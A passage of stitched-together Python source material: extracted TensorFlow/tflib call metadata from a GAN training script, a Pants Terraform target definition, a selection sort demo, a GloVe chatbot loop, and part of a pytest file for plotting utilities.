'([noise, conds], 1)\n', (2202, 2221), True, 'import tensorflow as tf\n'), ((2263, 2313), 'tensorflow.reshape', 'tf.reshape', (['output', '[n_samples, SQUARE_IM_DIM * 7]'], {}), '(output, [n_samples, SQUARE_IM_DIM * 7])\n', (2273, 2313), True, 'import tensorflow as tf\n'), ((2367, 2455), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (['"""Generator.Input"""', '(SQUARE_IM_DIM * 7)', '(4 * 4 * 4 * DIM)', 'output'], {}), "('Generator.Input', SQUARE_IM_DIM * 7, 4 * 4 * 4 * DIM,\n output)\n", (2388, 2455), True, 'import tflib as lib\n'), ((2484, 2541), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Generator.BN1"""', '[0]', 'output'], {}), "('Generator.BN1', [0], output)\n", (2511, 2541), True, 'import tflib as lib\n'), ((2555, 2573), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (2565, 2573), True, 'import tensorflow as tf\n'), ((2587, 2626), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4 * DIM, 4, 4]'], {}), '(output, [-1, 4 * DIM, 4, 4])\n', (2597, 2626), True, 'import tensorflow as tf\n'), ((2639, 2708), 'tflib.ops.deconv2d.Deconv2D', 'lib.ops.deconv2d.Deconv2D', (['"""Generator.2"""', '(4 * DIM)', '(2 * DIM)', '(5)', 'output'], {}), "('Generator.2', 4 * DIM, 2 * DIM, 5, output)\n", (2664, 2708), True, 'import tflib as lib\n'), ((2718, 2781), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Generator.BN2"""', '[0, 2, 3]', 'output'], {}), "('Generator.BN2', [0, 2, 3], output)\n", (2745, 2781), True, 'import tflib as lib\n'), ((2793, 2811), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (2803, 2811), True, 'import tensorflow as tf\n'), ((2826, 2891), 'tflib.ops.deconv2d.Deconv2D', 'lib.ops.deconv2d.Deconv2D', (['"""Generator.3"""', '(2 * DIM)', 'DIM', '(5)', 'output'], {}), "('Generator.3', 2 * DIM, DIM, 5, output)\n", (2851, 2891), True, 'import tflib as lib\n'), ((2903, 2966), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Generator.BN3"""', '[0, 2, 3]', 'output'], {}), "('Generator.BN3', [0, 2, 3], output)\n", (2930, 2966), True, 'import tflib as lib\n'), ((2978, 2996), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (2988, 2996), True, 'import tensorflow as tf\n'), ((3011, 3070), 'tflib.ops.deconv2d.Deconv2D', 'lib.ops.deconv2d.Deconv2D', (['"""Generator.5"""', 'DIM', '(2)', '(5)', 'output'], {}), "('Generator.5', DIM, 2, 5, output)\n", (3036, 3070), True, 'import tflib as lib\n'), ((3122, 3137), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (3129, 3137), True, 'import tensorflow as tf\n'), ((3150, 3191), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, OUTPUT_DIM_FLOW]'], {}), '(output, [-1, OUTPUT_DIM_FLOW])\n', (3160, 3191), True, 'import tensorflow as tf\n'), ((3295, 3338), 'tensorflow.reshape', 'tf.reshape', (['inputs', '[-1, 2, IM_DIM, IM_DIM]'], {}), '(inputs, [-1, 2, IM_DIM, IM_DIM])\n', (3305, 3338), True, 'import tensorflow as tf\n'), ((3379, 3426), 'tensorflow.reshape', 'tf.reshape', (['conditions', '[-1, 6, IM_DIM, IM_DIM]'], {}), '(conditions, [-1, 6, IM_DIM, IM_DIM])\n', (3389, 3426), True, 'import tensorflow as tf\n'), ((3512, 3541), 'tensorflow.concat', 'tf.concat', (['[inputs, conds]', '(1)'], {}), '([inputs, conds], 1)\n', (3521, 3541), True, 'import tensorflow as tf\n'), ((3585, 3651), 'tflib.ops.conv2d.Conv2D', 'lib.ops.conv2d.Conv2D', (['"""Discriminator.1"""', '(8)', 'DIM', '(5)', 'ins'], {'stride': '(2)'}), "('Discriminator.1', 8, DIM, 5, ins, stride=2)\n", (3606, 3651), True, 'import tflib as lib\n'), ((3730, 3805), 'tflib.ops.conv2d.Conv2D', 'lib.ops.conv2d.Conv2D', (['"""Discriminator.2"""', 'DIM', '(2 * DIM)', '(5)', 'output'], {'stride': '(2)'}), "('Discriminator.2', DIM, 2 * DIM, 5, output, stride=2)\n", (3751, 3805), True, 'import tflib as lib\n'), ((3958, 4037), 'tflib.ops.conv2d.Conv2D', 'lib.ops.conv2d.Conv2D', (['"""Discriminator.3"""', '(2 * DIM)', '(4 * DIM)', '(5)', 'output'], {'stride': '(2)'}), "('Discriminator.3', 2 * DIM, 4 * DIM, 5, output, stride=2)\n", (3979, 4037), True, 'import tflib as lib\n'), ((4421, 4462), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4 * 4 * 8 * DIM]'], {}), '(output, [-1, 4 * 4 * 8 * DIM])\n', (4431, 4462), True, 'import tensorflow as tf\n'), ((4489, 4562), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (['"""Discriminator.Output"""', '(4 * 4 * 8 * DIM)', '(1)', 'output'], {}), "('Discriminator.Output', 4 * 4 * 8 * DIM, 1, output)\n", (4510, 4562), True, 'import tflib as lib\n'), ((4569, 4593), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1]'], {}), '(output, [-1])\n', (4579, 4593), True, 'import tensorflow as tf\n'), ((5864, 5883), 'tensorflow.group', 'tf.group', (['*clip_ops'], {}), '(*clip_ops)\n', (5872, 5883), True, 'import tensorflow as tf\n'), ((8234, 8276), 'tensorflow.cast', 'tf.cast', (['(fixed_real_data + 1.0)', 'tf.float32'], {}), '(fixed_real_data + 1.0, tf.float32)\n', (8241, 8276), True, 'import tensorflow as tf\n'), ((8518, 8577), 'tensorflow.get_variable', 'tf.get_variable', (['"""noise"""'], {'shape': '[BATCH_SIZE, SQUARE_IM_DIM]'}), "('noise', shape=[BATCH_SIZE, SQUARE_IM_DIM])\n", (8533, 8577), True, 'import tensorflow as tf\n'), ((10863, 10902), 'numpy.asarray', 'np.asarray', (['sample_flowimages', 'np.int32'], {}), '(sample_flowimages, np.int32)\n', (10873, 10902), True, 'import numpy as np\n'), ((10925, 10962), 'numpy.asarray', 'np.asarray', (['real_flowimages', 'np.int32'], {}), '(real_flowimages, np.int32)\n', (10935, 10962), True, 'import numpy as np\n'), ((10984, 11033), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['sample_flowims_np', 'np.int32'], {}), '(sample_flowims_np, np.int32)\n', (11004, 11033), True, 'import tensorflow as tf\n'), ((11053, 11100), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['real_flowims_np', 'np.int32'], {}), '(real_flowims_np, np.int32)\n', (11073, 11100), True, 'import tensorflow as tf\n'), ((11297, 11364), 'tensorflow.reshape', 'tf.reshape', (['fixed_real_data_norm01', '[BATCH_SIZE, IM_DIM, IM_DIM, 2]'], {}), '(fixed_real_data_norm01, [BATCH_SIZE, IM_DIM, IM_DIM, 2])\n', (11307, 11364), True, 'import tensorflow as tf\n'), ((11617, 11672), 'tensorflow.reshape', 'tf.reshape', (['samples_01', '[BATCH_SIZE, IM_DIM, IM_DIM, 2]'], {}), '(samples_01, [BATCH_SIZE, IM_DIM, IM_DIM, 2])\n', (11627, 11672), True, 'import tensorflow as tf\n'), ((11988, 12024), 'tensorflow.keras.metrics.mse', 'tf.keras.metrics.mse', (['real_u', 'pred_u'], {}), '(real_u, pred_u)\n', (12008, 12024), True, 'import tensorflow as tf\n'), ((12098, 12140), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['mseval_per_entry_u', '[1, 2]'], {}), '(mseval_per_entry_u, [1, 2])\n', (12112, 12140), True, 'import tensorflow as tf\n'), ((12194, 12230), 'tensorflow.keras.metrics.mse', 'tf.keras.metrics.mse', (['real_v', 'pred_v'], {}), '(real_v, pred_v)\n', (12214, 12230), True, 'import tensorflow as tf\n'), ((12304, 12346), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['mseval_per_entry_v', '[1, 2]'], {}), '(mseval_per_entry_v, [1, 2])\n', (12318, 12346), True, 'import tensorflow as tf\n'), ((12703, 12729), 'tensorflow.add', 'tf.add', (['mseval_u', 'mseval_v'], {}), '(mseval_u, mseval_v)\n', (12709, 12729), True, 'import tensorflow as tf\n'), ((12767, 12795), 'tensorflow.constant', 'tf.constant', (['(2.0)'], {'shape': '[64]'}), '(2.0, shape=[64])\n', (12778, 12795), True, 'import tensorflow as tf\n'), ((12867, 12893), 'tensorflow.div', 'tf.div', (['mseval_uv', 'tensor2'], {}), '(mseval_uv, tensor2)\n', (12873, 12893), True, 'import tensorflow as tf\n'), ((13327, 13384), 'tensorflow.reshape', 'tf.reshape', (['real_flowims', '[BATCH_SIZE, IM_DIM, IM_DIM, 3]'], {}), '(real_flowims, [BATCH_SIZE, IM_DIM, IM_DIM, 3])\n', (13337, 13384), True, 'import tensorflow as tf\n'), ((13399, 13436), 'tensorflow.image.rgb_to_grayscale', 'tf.image.rgb_to_grayscale', (['real_color'], {}), '(real_color)\n', (13424, 13436), True, 'import tensorflow as tf\n'), ((13631, 13690), 'tensorflow.reshape', 'tf.reshape', (['sample_flowims', '[BATCH_SIZE, IM_DIM, IM_DIM, 3]'], {}), '(sample_flowims, [BATCH_SIZE, IM_DIM, IM_DIM, 3])\n', (13641, 13690), True, 'import tensorflow as tf\n'), ((13738, 13775), 'tensorflow.image.rgb_to_grayscale', 'tf.image.rgb_to_grayscale', (['pred_color'], {}), '(pred_color)\n', (13763, 13775), True, 'import tensorflow as tf\n'), ((13853, 13895), 'tensorflow.keras.metrics.mse', 'tf.keras.metrics.mse', (['real_gray', 'pred_gray'], {}), '(real_gray, pred_gray)\n', (13873, 13895), True, 'import tensorflow as tf\n'), ((13942, 13986), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['mseval_per_entry_rgb', '[1, 2]'], {}), '(mseval_per_entry_rgb, [1, 2])\n', (13956, 13986), True, 'import tensorflow as tf\n'), ((15099, 15111), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (15109, 15111), True, 'import tensorflow as tf\n'), ((1838, 1882), 'tensorflow.random_normal', 'tf.random_normal', (['[n_samples, SQUARE_IM_DIM]'], {}), '([n_samples, SQUARE_IM_DIM])\n', (1854, 1882), True, 'import tensorflow as tf\n'), ((3847, 3914), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Discriminator.BN2"""', '[0, 2, 3]', 'output'], {}), "('Discriminator.BN2', [0, 2, 3], output)\n", (3874, 3914), True, 'import tflib as lib\n'), ((4077, 4144), 'tflib.ops.batchnorm.Batchnorm', 'lib.ops.batchnorm.Batchnorm', (['"""Discriminator.BN3"""', '[0, 2, 3]', 'output'], {}), "('Discriminator.BN3', [0, 2, 3], output)\n", (4104, 4144), True, 'import tflib as lib\n'), ((5285, 5310), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (5299, 5310), True, 'import tensorflow as tf\n'), ((5327, 5352), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (5341, 5352), True, 'import tensorflow as tf\n'), ((5355, 5380), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_real'], {}), '(disc_real)\n', (5369, 5380), True, 'import tensorflow as tf\n'), ((6082, 6146), 'tensorflow.random_uniform', 'tf.random_uniform', ([], {'shape': '[BATCH_SIZE, 1]', 'minval': '(0.0)', 'maxval': '(1.0)'}), '(shape=[BATCH_SIZE, 1], minval=0.0, maxval=1.0)\n', (6099, 6146), True, 'import tensorflow as tf\n'), ((6475, 6510), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['((slopes - 1.0) ** 2)'], {}), '((slopes - 1.0) ** 2)\n', (6489, 6510), True, 'import tensorflow as tf\n'), ((8649, 8718), 'tensorflow.random_normal', 'tf.random_normal', ([], {'shape': '[BATCH_SIZE, SQUARE_IM_DIM]', 'dtype': 'tf.float32'}), '(shape=[BATCH_SIZE, SQUARE_IM_DIM], dtype=tf.float32)\n', (8665, 8718), True, 'import tensorflow as tf\n'), ((9866, 9898), 'numpy.transpose', 'np.transpose', (['flowimg', '[2, 0, 1]'], {}), '(flowimg, [2, 0, 1])\n', (9878, 9898), True, 'import numpy as np\n'), ((10173, 10203), 'tflib.flow_handler.computeFlowImg', 'fh.computeFlowImg', (['real_uvflow'], {}), '(real_uvflow)\n', (10190, 10203), True, 'import tflib.flow_handler as fh\n'), ((10347, 10384), 'numpy.transpose', 'np.transpose', (['real_flowimg', '[2, 0, 1]'], {}), '(real_flowimg, [2, 0, 1])\n', (10359, 10384), True, 'import numpy as np\n'), ((10506, 10558), 'numpy.insert', 'np.insert', (['images2show', '(i * 2 + 1)', 'flowimg_T'], {'axis': '(0)'}), '(images2show, i * 2 + 1, flowimg_T, axis=0)\n', (10515, 10558), True, 'import numpy as np\n'), ((13260, 13293), 'tensorflow.cast', 'tf.cast', (['real_flowims', 'tf.float32'], {}), '(real_flowims, tf.float32)\n', (13267, 13293), True, 'import tensorflow as tf\n'), ((13562, 13597), 'tensorflow.cast', 'tf.cast', (['sample_flowims', 'tf.float32'], {}), '(sample_flowims, tf.float32)\n', (13569, 13597), True, 'import tensorflow as tf\n'), ((14568, 14634), 'tflib.plot.plot', 'lib.plot.plot', (["('MSE uv for sample %d' % (i + 1))", 'mseval_list_uv[i]'], {}), "('MSE uv for sample %d' % (i + 1), mseval_list_uv[i])\n", (14581, 14634), True, 'import tflib as lib\n'), ((14641, 14709), 'tflib.plot.plot', 'lib.plot.plot', (["('MSE rgb for sample %d' % (i + 1))", 'mseval_list_rgb[i]'], {}), "('MSE rgb for sample %d' % (i + 1), mseval_list_rgb[i])\n", (14654, 14709), True, 'import tflib as lib\n'), ((15271, 15299), 'tflib.plot.restore', 'lib.plot.restore', (['START_ITER'], {}), '(START_ITER)\n', (15287, 15299), True, 'import tflib as lib\n'), ((15527, 15538), 'time.time', 'time.time', ([], {}), '()\n', (15536, 15538), False, 'import time\n'), ((16605, 16649), 'tflib.plot.plot', 'lib.plot.plot', (['"""train disc cost"""', '_disc_cost'], {}), "('train disc cost', _disc_cost)\n", (16618, 16649), True, 'import tflib as lib\n'), ((17809, 17824), 'tflib.plot.tick', 'lib.plot.tick', ([], {}), '()\n', (17822, 17824), True, 'import tflib as lib\n'), ((4722, 4756), 'tensorflow.cast', 'tf.cast', (['cond_data_int', 'tf.float32'], {}), '(cond_data_int, tf.float32)\n', (4729, 4756), True, 'import tensorflow as tf\n'), ((5401, 5447), 'tensorflow.train.RMSPropOptimizer', 'tf.train.RMSPropOptimizer', ([], {'learning_rate': '(5e-05)'}), '(learning_rate=5e-05)\n', (5426, 5447), True, 'import tensorflow as tf\n'), ((5507, 5553), 'tensorflow.train.RMSPropOptimizer', 'tf.train.RMSPropOptimizer', ([], {'learning_rate': '(5e-05)'}), '(learning_rate=5e-05)\n', (5532, 5553), True, 'import tensorflow as tf\n'), ((5950, 5975), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (5964, 5975), True, 'import tensorflow as tf\n'), ((5992, 6017), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_fake'], {}), '(disc_fake)\n', (6006, 6017), True, 'import tensorflow as tf\n'), ((6020, 6045), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['disc_real'], {}), '(disc_real)\n', (6034, 6045), True, 'import tensorflow as tf\n'), ((8320, 8360), 'tensorflow.cast', 'tf.cast', (['fixed_cond_data_int', 'tf.float32'], {}), '(fixed_cond_data_int, tf.float32)\n', (8327, 8360), True, 'import tensorflow as tf\n'), ((17783, 17799), 'tflib.plot.flush', 'lib.plot.flush', ([], {}), '()\n', (17797, 17799), True, 'import tflib as lib\n'), ((5762, 5815), 'tensorflow.clip_by_value', 'tf.clip_by_value', (['var', 'clip_bounds[0]', 'clip_bounds[1]'], {}), '(var, clip_bounds[0], clip_bounds[1])\n', (5778, 5815), True, 'import tensorflow as tf\n'), ((6406, 6426), 'tensorflow.square', 'tf.square', (['gradients'], {}), '(gradients)\n', (6415, 6426), True, 'import tensorflow as tf\n'), ((6567, 6633), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0001)', 'beta1': '(0.5)', 'beta2': '(0.9)'}), '(learning_rate=0.0001, beta1=0.5, beta2=0.9)\n', (6589, 6633), True, 'import tensorflow as tf\n'), ((6692, 6758), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0001)', 'beta1': '(0.5)', 'beta2': '(0.9)'}), '(learning_rate=0.0001, beta1=0.5, beta2=0.9)\n', (6714, 6758), True, 'import tensorflow as tf\n'), ((16680, 16691), 'time.time', 'time.time', ([], {}), '()\n', (16689, 16691), False, 'import time\n'), ((17351, 17374), 'numpy.mean', 'np.mean', (['dev_disc_costs'], {}), '(dev_disc_costs)\n', (17358, 17374), True, 'import numpy as np\n'), ((6903, 6926), 'tensorflow.ones_like', 'tf.ones_like', (['disc_fake'], {}), '(disc_fake)\n', (6915, 6926), True, 'import tensorflow as tf\n'), ((7012, 7036), 'tensorflow.zeros_like', 'tf.zeros_like', (['disc_fake'], {}), '(disc_fake)\n', (7025, 7036), True, 'import tensorflow as tf\n'), ((7122, 7145), 'tensorflow.ones_like', 'tf.ones_like', (['disc_real'], {}), '(disc_real)\n', (7134, 7145), True, 'import tensorflow as tf\n'), ((7188, 7243), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0002)', 'beta1': '(0.5)'}), '(learning_rate=0.0002, beta1=0.5)\n', (7210, 7243), True, 'import tensorflow as tf\n'), ((7352, 7385), 'tflib.params_with_name', 'lib.params_with_name', (['"""Generator"""'], {}), "('Generator')\n", (7372, 7385), True, 'import tflib as lib\n'), ((7407, 7462), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0002)', 'beta1': '(0.5)'}), '(learning_rate=0.0002, beta1=0.5)\n', (7429, 7462), True, 'import tensorflow as tf\n'), ((7573, 7611), 'tflib.params_with_name', 'lib.params_with_name', (['"""Discriminator."""'], {}), "('Discriminator.')\n", (7593, 7611), True, 'import tflib as lib\n')] |
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from pants.engine.rules import collect_rules
from pants.engine.target import (
COMMON_TARGET_FIELDS,
Dependencies,
FieldSet,
MultipleSourcesField,
Target,
generate_multiple_sources_field_help_message,
)
from pants.util.strutil import softwrap
class TerraformModuleSourcesField(MultipleSourcesField):
default = ("*.tf",)
expected_file_extensions = (".tf",)
ban_subdirectories = True
help = generate_multiple_sources_field_help_message(
"Example: `sources=['example.tf', 'new_*.tf', '!old_ignore.tf']`"
)
@dataclass(frozen=True)
class TerraformFieldSet(FieldSet):
required_fields = (TerraformModuleSourcesField,)
sources: TerraformModuleSourcesField
class TerraformModuleTarget(Target):
alias = "terraform_module"
core_fields = (*COMMON_TARGET_FIELDS, Dependencies, TerraformModuleSourcesField)
help = softwrap(
"""
A single Terraform module corresponding to a directory.
There must only be one `terraform_module` in a directory.
Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.
"""
)
def rules():
return collect_rules()
| [
"pants.engine.target.generate_multiple_sources_field_help_message",
"pants.util.strutil.softwrap",
"dataclasses.dataclass",
"pants.engine.rules.collect_rules"
] | [((763, 785), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (772, 785), False, 'from dataclasses import dataclass\n'), ((634, 750), 'pants.engine.target.generate_multiple_sources_field_help_message', 'generate_multiple_sources_field_help_message', (['"""Example: `sources=[\'example.tf\', \'new_*.tf\', \'!old_ignore.tf\']`"""'], {}), '(\n "Example: `sources=[\'example.tf\', \'new_*.tf\', \'!old_ignore.tf\']`")\n', (678, 750), False, 'from pants.engine.target import COMMON_TARGET_FIELDS, Dependencies, FieldSet, MultipleSourcesField, Target, generate_multiple_sources_field_help_message\n'), ((1082, 1342), 'pants.util.strutil.softwrap', 'softwrap', (['"""\n A single Terraform module corresponding to a directory.\n\n There must only be one `terraform_module` in a directory.\n\n Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.\n """'], {}), '(\n """\n A single Terraform module corresponding to a directory.\n\n There must only be one `terraform_module` in a directory.\n\n Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.\n """\n )\n', (1090, 1342), False, 'from pants.util.strutil import softwrap\n'), ((1373, 1388), 'pants.engine.rules.collect_rules', 'collect_rules', ([], {}), '()\n', (1386, 1388), False, 'from pants.engine.rules import collect_rules\n')] |
"""
@author: <NAME>
@date: 11-Jul-17
@intepreter: Python 3.6
Worst Case Analysis: Selection Sort -> O(n^2)
"""
from timeit import Timer, default_timer
from random import shuffle
ARR = list()
def selection_sort(data):
"""Selection sort implementation"""
for i in range(len(data)):
min_pos = i
for j in range(i + 1, len(data)):
if data[j] < data[min_pos]:
min_pos = j
data[i], data[min_pos] = data[min_pos], data[i]
def main():
"""Main Driver Function"""
start = default_timer()
shuffle(ARR)
print("Input Array:", ARR)
selection_sort(ARR)
print("Sorted Array:", ARR)
print("Sorting Time: %f Seconds\n" % (default_timer() - start))
if __name__ == "__main__":
print("Selection Sort")
print("-" * len("Selection Sort"))
ARR = list(range(25, 0, -1)) # Worst Case Input(Reverse Sorted)
t = Timer(main)
print(
"\nAverage sorting time for 25 elements in 3 runs = %f Seconds"
% (t.timeit(3) / 3)
)
| [
"timeit.default_timer",
"timeit.Timer",
"random.shuffle"
] | [((536, 551), 'timeit.default_timer', 'default_timer', ([], {}), '()\n', (549, 551), False, 'from timeit import Timer, default_timer\n'), ((556, 568), 'random.shuffle', 'shuffle', (['ARR'], {}), '(ARR)\n', (563, 568), False, 'from random import shuffle\n'), ((897, 908), 'timeit.Timer', 'Timer', (['main'], {}), '(main)\n', (902, 908), False, 'from timeit import Timer, default_timer\n'), ((698, 713), 'timeit.default_timer', 'default_timer', ([], {}), '()\n', (711, 713), False, 'from timeit import Timer, default_timer\n')] |
import random
import torch
import pandas as pd
import numpy as np
from glove_model import get_model
from intent_initializer import read_all_intents, read_all_responses
from GloVe_helper import GloVeLoader
PATH = './config/'
BOT_NAME = 'Bavardez'
def load_bot():
model_details = torch.load(PATH+'model_details_GloVe.pt')
model = get_model(model_details['input_size'], model_details['hidden_size'], model_details['output_size'])
model.load_state_dict(model_details['model_state'])
model.eval()
tags = model_details['tags']
return model, tags
def main():
model, tags = load_bot()
df_responses = read_all_responses()
activation = torch.nn.Softmax(1)
gl = GloVeLoader()
print("Let's chat! (GloVe version) Type \"quit\" to exit.")
while True:
sentence = input("You:\t")
if sentence == "quit":
break
embed = gl.pull_glove_embed([sentence])
output = model(embed)
probs = activation(output).flatten()
predicted_label = torch.argmax(probs)
tag = tags[predicted_label.item()]
if probs[predicted_label]>0.5:
if tag in list(df_responses.keys()):
answer = random.choice(df_responses[tag])
else:
answer = "Sorry there's an error in OUR SYSTEM! Please re-phrase"
else:
answer = "I do not understand you."
print(BOT_NAME+":\t"+answer)
print("Thankyou for using "+BOT_NAME)
if __name__ == '__main__':
main() | [
"random.choice",
"torch.nn.Softmax",
"torch.load",
"glove_model.get_model",
"GloVe_helper.GloVeLoader",
"intent_initializer.read_all_responses",
"torch.argmax"
] | [((281, 324), 'torch.load', 'torch.load', (["(PATH + 'model_details_GloVe.pt')"], {}), "(PATH + 'model_details_GloVe.pt')\n", (291, 324), False, 'import torch\n'), ((332, 434), 'glove_model.get_model', 'get_model', (["model_details['input_size']", "model_details['hidden_size']", "model_details['output_size']"], {}), "(model_details['input_size'], model_details['hidden_size'],\n model_details['output_size'])\n", (341, 434), False, 'from glove_model import get_model\n'), ((605, 625), 'intent_initializer.read_all_responses', 'read_all_responses', ([], {}), '()\n', (623, 625), False, 'from intent_initializer import read_all_intents, read_all_responses\n'), ((640, 659), 'torch.nn.Softmax', 'torch.nn.Softmax', (['(1)'], {}), '(1)\n', (656, 659), False, 'import torch\n'), ((666, 679), 'GloVe_helper.GloVeLoader', 'GloVeLoader', ([], {}), '()\n', (677, 679), False, 'from GloVe_helper import GloVeLoader\n'), ((944, 963), 'torch.argmax', 'torch.argmax', (['probs'], {}), '(probs)\n', (956, 963), False, 'import torch\n'), ((1087, 1119), 'random.choice', 'random.choice', (['df_responses[tag]'], {}), '(df_responses[tag])\n', (1100, 1119), False, 'import random\n')] |
"""
This file contains tests for plotter_utils.py.
@author: <NAME>
"""
import matplotlib.pyplot as plt
import numpy as np
import pytest
from matplotlib.figure import Figure
from gdef_reporter.plotter_styles import get_plotter_style_histogram
from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, \
_extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot
from tests.conftest import AUTO_SHOW
ORIGINAL_FIGURE_SIZE = (4, 3.5)
ORIGINAL_DPI = 300
def auto_show(fig):
if AUTO_SHOW:
fig.show()
# tests for functions to plot a 2D area map
class TestAreaPlots:
def test_plot_to_ax(self, data_test_cases):
fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)
plot_to_ax(ax1, data_test_cases, pixel_width=1.0)
auto_show(fig1)
assert type(fig1) is Figure
assert fig1.axes[1].get_title() == "nm" # default unit for z-values should be nm
fig2, ax2 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)
pixel_width = 5.0
title = f"{type(data_test_cases).__name__}\npixel_width={pixel_width}"
plot_to_ax(ax2, data_test_cases, pixel_width=pixel_width, title=title)
auto_show(fig2)
assert ax2.get_title() == title
fig3, ax3 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)
z_factor = 1.0
title = f"{type(data_test_cases).__name__}\nz_unit: [m] - z_factor={z_factor}"
plot_to_ax(ax3, data_test_cases, pixel_width=5.0, z_unit="µm", title=title)
auto_show(fig3)
assert fig3.axes[1].get_title() == "\u03BCm"
def test_create_plot(self, data_test_cases):
fig1 = create_plot(data_test_cases, 1e-6, "default value for cropped (True)", ORIGINAL_FIGURE_SIZE,
ORIGINAL_DPI)
auto_show(fig1)
assert np.any(comparison := (fig1.get_size_inches() < ORIGINAL_FIGURE_SIZE)) and not np.all(comparison)
assert fig1.dpi == ORIGINAL_DPI
fig2 = create_plot(data_test_cases, 1e-6, "cropped=False", max_figure_size=ORIGINAL_FIGURE_SIZE, cropped=False)
assert np.all(fig2.get_size_inches() == ORIGINAL_FIGURE_SIZE)
auto_show(fig2)
class Test1DPlotZHistogram:
def test_plot_z_histogram_to_ax__defaults(self, data_test_cases):
# first, check default behaviour of parameters title, , n_bins, units and add_norm
fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
plot_z_histogram_to_ax(ax1, data_test_cases, title="")
auto_show(fig1)
assert len(ax1.lines) == 0 # no Gauss fit (expected default behaviour)
assert ax1.get_title().startswith("\u03BC=") # default title starts with mu=...
assert ax1.get_xlabel() == "z [\u03BCm]" # default units should be µm; note: µ == \u03BC is False!
assert len(ax1.containers[0]) == 200 # default n_bins should be 200
def test_plot_z_histogram_to_ax__defaults_multiple(self, multiple_data_test_cases):
# first, check default behaviour of parameters title, , n_bins, units and add_norm
fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
if isinstance(multiple_data_test_cases, dict):
if (_list := len([data for data in multiple_data_test_cases.values() if isinstance(data, np.ndarray)]) > 0)\
and _list < len(multiple_data_test_cases):
with pytest.raises(AssertionError):
plot_z_histogram_to_ax(ax1, multiple_data_test_cases)
return
plot_z_histogram_to_ax(ax1, multiple_data_test_cases, title="")
auto_show(fig1)
assert len(ax1.lines) == 0 # no Gauss fit (expected default behaviour)
if len(multiple_data_test_cases) == 1:
assert ax1.get_title().startswith("\u03BC=") # default title for one data set shows mu=...
else:
assert ax1.get_title() == "" # no default title if no data or more than one dataset
assert ax1.get_xlabel() == "z [\u03BCm]" # default units should be µm; note: µ == \u03BC is False!
for container in ax1.containers:
assert len(container.patches) == 200 # default n_bins should be 200
def test_plot_z_histogram_to_ax__set_parameters(self, data_test_cases):
# first, check setting a title, selecting units µm, set n_bins and draw normal distribution fit
fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
title = "Use [µm] and Gauss fit"
n_bins = 20
plot_z_histogram_to_ax(ax1, data_test_cases, n_bins=n_bins, units="nm", title=title, add_norm=True)
auto_show(fig1)
assert len(ax1.lines) == 1 # Gauss fit (add_norm=True)
assert ax1.get_title() == title
assert str(ax1.get_xlabel()) == str(f"z [nm]") # note: comparison between µ and \u03BC is False!
assert len(ax1.containers[0]) == n_bins # default n_bins should be 200
# second, check no title via title=None
fig2, ax2 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
title = None
plot_z_histogram_to_ax(ax2, data_test_cases, n_bins=20, units="µm", title=title)
auto_show(fig2)
assert ax2.get_title() == "" # expected for title=None
def test_plot_z_histogram_to_ax__multiple(self, multiple_data_test_cases):
